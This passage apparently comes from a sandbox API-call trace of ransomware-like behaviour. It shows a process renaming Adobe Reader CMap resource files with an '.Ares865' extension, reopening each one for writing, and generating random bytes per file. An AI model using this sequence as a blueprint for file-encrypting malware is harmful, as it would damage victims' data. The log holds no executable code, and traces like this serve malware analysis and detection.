lpString1="Adobe-Japan1-1") returned="Adobe-Japan1-1" [0161.505] lstrlenW (lpString="Adobe-Japan1-1") returned 14 [0161.505] lstrlenW (lpString="Ares865") returned 7 [0161.505] lstrcmpiW (lpString1="apan1-1", lpString2="Ares865") returned -1 [0161.506] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1.Ares865") returned 77 [0161.506] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-1"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-1.ares865"), dwFlags=0x1) returned 1 [0161.508] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.509] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3524) returned 1 [0161.509] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.510] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.510] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.513] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.514] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.514] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.514] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-2" | out: lpString1="Adobe-Japan1-2") returned="Adobe-Japan1-2" [0161.514] lstrlenW (lpString="Adobe-Japan1-2") returned 14 [0161.514] lstrlenW (lpString="Ares865") returned 7 [0161.514] lstrcmpiW (lpString1="apan1-2", lpString2="Ares865") returned -1 [0161.515] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2.Ares865") returned 77 [0161.515] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-2.ares865"), dwFlags=0x1) returned 1 [0161.532] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.532] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3564) returned 1 [0161.532] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.533] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.533] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.536] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.537] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.537] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.537] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-3" | out: lpString1="Adobe-Japan1-3") returned="Adobe-Japan1-3" [0161.538] lstrlenW (lpString="Adobe-Japan1-3") returned 14 [0161.538] lstrlenW (lpString="Ares865") returned 7 [0161.538] lstrcmpiW (lpString1="apan1-3", lpString2="Ares865") returned -1 [0161.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3.Ares865") returned 77 [0161.538] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-3"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-3.ares865"), dwFlags=0x1) returned 1 [0161.540] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.540] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3575) returned 1 [0161.540] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.541] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.541] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.545] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.545] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.545] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.546] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-4" | out: lpString1="Adobe-Japan1-4") returned="Adobe-Japan1-4" [0161.546] lstrlenW (lpString="Adobe-Japan1-4") returned 14 [0161.546] lstrlenW (lpString="Ares865") returned 7 [0161.546] lstrcmpiW (lpString1="apan1-4", lpString2="Ares865") returned -1 [0161.546] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4.Ares865") returned 77 [0161.546] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-4"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-4.ares865"), dwFlags=0x1) returned 1 [0161.548] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.548] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4077) returned 1 [0161.549] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.549] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.549] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.553] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.554] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.554] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.554] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-5" | out: lpString1="Adobe-Japan1-5") returned="Adobe-Japan1-5" [0161.554] lstrlenW (lpString="Adobe-Japan1-5") returned 14 [0161.554] lstrlenW (lpString="Ares865") returned 7 [0161.554] lstrcmpiW (lpString1="apan1-5", lpString2="Ares865") returned -1 [0161.555] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5.Ares865") returned 77 [0161.555] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-5"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-5.ares865"), dwFlags=0x1) returned 1 [0161.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.557] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4476) returned 1 [0161.557] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.558] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.558] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.559] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.560] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.560] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.561] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-6" | out: lpString1="Adobe-Japan1-6") returned="Adobe-Japan1-6" [0161.561] lstrlenW (lpString="Adobe-Japan1-6") returned 14 [0161.561] lstrlenW (lpString="Ares865") returned 7 [0161.561] lstrcmpiW (lpString1="apan1-6", lpString2="Ares865") returned -1 [0161.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6.Ares865") returned 77 [0161.561] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-6"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-6.ares865"), dwFlags=0x1) returned 1 [0161.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4707) returned 1 [0161.563] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.564] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.564] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.568] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.569] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.569] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.569] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-90ms-RKSJ" | out: lpString1="Adobe-Japan1-90ms-RKSJ") returned="Adobe-Japan1-90ms-RKSJ" [0161.569] lstrlenW (lpString="Adobe-Japan1-90ms-RKSJ") returned 22 [0161.570] lstrlenW (lpString="Ares865") returned 7 [0161.570] lstrcmpiW (lpString1="ms-RKSJ", lpString2="Ares865") returned 1 [0161.570] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ.Ares865") returned 85 [0161.570] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90ms-rksj"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90ms-rksj.ares865"), dwFlags=0x1) returned 1 [0161.572] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90ms-rksj.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.572] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6353) returned 1 [0161.572] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.573] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.573] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.575] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.576] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.576] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.577] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-90pv-RKSJ" | out: lpString1="Adobe-Japan1-90pv-RKSJ") returned="Adobe-Japan1-90pv-RKSJ" [0161.577] lstrlenW (lpString="Adobe-Japan1-90pv-RKSJ") returned 22 [0161.577] lstrlenW (lpString="Ares865") returned 7 [0161.577] lstrcmpiW (lpString1="pv-RKSJ", lpString2="Ares865") returned 1 [0161.577] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ.Ares865") returned 85 [0161.577] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90pv-rksj"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90pv-rksj.ares865"), dwFlags=0x1) returned 1 [0161.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90pv-rksj.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.582] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8442) returned 1 [0161.582] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.583] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.583] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.585] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.586] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.587] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-H-CID" | out: lpString1="Adobe-Japan1-H-CID") returned="Adobe-Japan1-H-CID" [0161.587] lstrlenW (lpString="Adobe-Japan1-H-CID") returned 18 [0161.587] lstrlenW (lpString="Ares865") returned 7 [0161.587] lstrcmpiW (lpString1="1-H-CID", lpString2="Ares865") returned -1 [0161.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID.Ares865") returned 81 [0161.587] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-cid"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-cid.ares865"), dwFlags=0x1) returned 1 [0161.590] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-cid.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.590] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2291) returned 1 [0161.590] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.591] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.591] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.594] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.595] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.595] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.596] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-H-Host" | out: lpString1="Adobe-Japan1-H-Host") returned="Adobe-Japan1-H-Host" [0161.596] lstrlenW (lpString="Adobe-Japan1-H-Host") returned 19 [0161.596] lstrlenW (lpString="Ares865") returned 7 [0161.596] lstrcmpiW (lpString1="-H-Host", lpString2="Ares865") returned 1 [0161.596] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host.Ares865") returned 82 [0161.596] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-host"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-host.ares865"), dwFlags=0x1) returned 1 [0161.598] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-host.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.598] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6625) returned 1 [0161.598] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.599] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.599] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.602] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.603] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.603] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.604] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-H-Mac" | out: lpString1="Adobe-Japan1-H-Mac") returned="Adobe-Japan1-H-Mac" [0161.604] lstrlenW (lpString="Adobe-Japan1-H-Mac") returned 18 [0161.604] lstrlenW (lpString="Ares865") returned 7 [0161.604] lstrcmpiW (lpString1="1-H-Mac", lpString2="Ares865") returned -1 [0161.604] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac.Ares865") returned 81 [0161.604] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-mac"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-mac.ares865"), dwFlags=0x1) returned 1 [0161.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-mac.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.607] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5492) returned 1 [0161.608] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.608] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.608] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.611] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.611] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.612] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-UCS2" | out: lpString1="Adobe-Japan1-UCS2") returned="Adobe-Japan1-UCS2" [0161.612] lstrlenW (lpString="Adobe-Japan1-UCS2") returned 17 [0161.612] lstrlenW (lpString="Ares865") returned 7 [0161.612] lstrcmpiW (lpString1="n1-UCS2", lpString2="Ares865") returned 1 [0161.612] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2.Ares865") returned 80 [0161.612] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.615] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 